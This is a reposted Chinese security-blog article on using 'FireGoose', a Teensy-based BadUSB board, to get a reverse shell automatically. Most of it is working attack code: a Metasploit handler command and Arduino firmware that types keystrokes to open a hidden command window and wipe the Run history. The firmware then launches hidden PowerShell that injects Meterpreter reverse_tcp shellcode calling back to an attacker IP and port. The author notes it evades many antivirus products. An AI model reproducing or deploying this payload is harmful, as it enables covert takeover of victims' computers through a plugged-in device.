转载

中国烧鹅系列:利用烧鹅自动获得反弹SHELL

烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板,外观看起来很像USB Rubber Ducky(大黄鸭),但并非Hak5所销售版本。 

所以没有使用USB Rubber Ducky的固件功能,不可以直接使用USB Rubber Ducky的脚本,可以直接使用Arduino IDE来编写自定义代码、也可以使用S.E.T、Kautilya套件生成代码使用。
自带SD卡槽,可外接SD作为扩展,支持BadUSB代码。

FreeBuf报道《烧鹅:中国人自己的HID Hacking Device》 , http://wiki.radiowar.org/烧鹅

利用烧鹅自动获得反弹SHELL

原理:烧鹅模拟USB键盘,自动输入Win+R ,为了尽可能的隐藏,开启一个很小的CMD窗口,然后利用powershell 隐藏注入shellcode 来反弹shell。

中国烧鹅系列:利用烧鹅自动获得反弹SHELL

首先在自己的服务器使用metasploit监听一个端口:

 msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4443 E

然后将以下代码修改IP和你自己的端口之后编译 写入烧鹅,部分代码做了注释。

也可以去github下载代码: https://github.com/RadioWar/FireGoose

中国烧鹅系列:利用烧鹅自动获得反弹SHELL

代码: 

 void setup() {   delay(4000);    //设置延时,给USB响应时间    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);  //按下Win键   Keyboard.set_key1(KEY_R);  //按下R键   Keyboard.send_now();       //发送Win+R   delay(100);      Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的(精华)   Keyboard.set_key1(KEY_ENTER);   Keyboard.send_now();   delay(300);   //利用注册表清除开始--运行的记录   Keyboard.println("reg delete HKCU//Software//Microsoft//Windows//CurrentVersion//Explorer//RunMRU /f");   Keyboard.set_key1(KEY_ENTER);   Keyboard.send_now();    delay(100);   //利用Pwoershell 隐藏窗口执行shellcode,不会生成文件(shellcode是MSF生成的reverse-tcp,当然你也可以替换成其他功能的shellcode)   Keyboard.println("if exist C://Windows//SysWOW64 ( set PWRSHLXDD=C://Windows//SysWOW64//WindowsPowerShell//v1.0//powershell) else ( set PWRSHLXDD=powershell )");   Keyboard.print("%PWRSHLXDD% -nop -w hidden -c /"$1 = '$c = ");   Keyboard.print("[DllImport(///"kernel32.dll///")]public static ext");   Keyboard.print("ern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwS");   Keyboard.print("ize, uint flAllocationType, uint flProtect);[DllIm");   Keyboard.print("port(///"kernel32.dll///")]public static extern In");   Keyboard.print("tPtr CreateThread(IntPtr lpThreadAttributes, uint ");   Keyboard.print("dwStackSize, IntPtr lpStartAddress, IntPtr lpParam");   Keyboard.print("eter, uint dwCreationFlags, IntPtr lpThreadId);[Dl");   Keyboard.print("lImport(///"msvcrt.dll///")]public static extern I");   Keyboard.print("ntPtr memset(IntPtr dest, uint src, uint count);");   Keyboard.print(";$w = Add-Type -memberDefinition $c -Name ///"Win3");   Keyboard.print("2///" -namespace Win32Functions -passthru;[Byte[]]");   Keyboard.print(";[Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,");   Keyboard.print("0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,");   Keyboard.print("0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,");   Keyboard.print("0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,");   Keyboard.print("0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,");   Keyboard.print("0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,");   Keyboard.print("0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,");   Keyboard.print("0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,");   Keyboard.print("0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,");   Keyboard.print("0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,");   Keyboard.print("0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,");   Keyboard.print("0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,");   Keyboard.print("0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,");   Keyboard.print("0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,");   Keyboard.print("0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,");   Keyboard.print("0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,");   Keyboard.print("0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,");   Keyboard.print("0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,");   Keyboard.print("0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,");   Keyboard.print("0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,");   // 替换IP   [0xC0,0xA8,0x00,0x68] --192.168.0.104 的16进制   // 替换端口 [0x11,0x5b] --4443的16进制   Keyboard.print("0xC0,0xA8,0x00,0x68,0x68,0x02,0x00,0x11,0x5b,0"); //这里改成通用版本的,方便自定义IP+Port      Keyboard.print("x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0");   Keyboard.print("x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0");   Keyboard.print("x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0");   Keyboard.print("x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0");   Keyboard.print("xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0");   Keyboard.print("x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0");   Keyboard.print("xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0");   Keyboard.print("xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0");   Keyboard.print("xf6,0x75,0xec,0xc3;$size = 0x1000;if ($sc.Length -");   Keyboard.print("gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc");   Keyboard.print("(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length");   Keyboard.print("-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $");   Keyboard.print("sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;");   Keyboard.print("){Start-sleep 60};';$gq = [System.Convert]::ToBase");   Keyboard.print("64String([System.Text.Encoding]::Unicode.GetBytes(");   Keyboard.print("$1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRo");   Keyboard.print("ot + ///"////syswow64////WindowsPowerShell////v1.0");   Keyboard.print("////powershell///";$cmd = ///"-nop -noni -enc ///"");   Keyboard.print(";iex ///" $x86 $cmd $gq///"}else{$cmd = ///"-nop -");   Keyboard.print("noni -enc///";iex ///" powershell $cmd $gq///";}/"");   Keyboard.set_key1(KEY_ENTER);    Keyboard.send_now();        //执行以上powershell代码   Keyboard.set_modifier(0);  //释放所有的按键   Keyboard.set_key1(0);   Keyboard.send_now();   delay(300); }  void loop()  {  } 

中国烧鹅系列:利用烧鹅自动获得反弹SHELL

实拍视频效果如下:

PS:这个只能算是实现了自动化reverse Shell ,优点是窗口小,利用PS注入shellcode不会生成文件,可以绕过不少杀软的查杀。但是其隐藏效果并非完美,代码输入时间也有点长。大家可以脑洞一下,完善烧鹅的Payload。

下期预告:利用烧鹅自动执行SD卡上的自定义程序 (5秒左右完成Attack)

* 作者/BinAry,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

正文到此结束
Loading...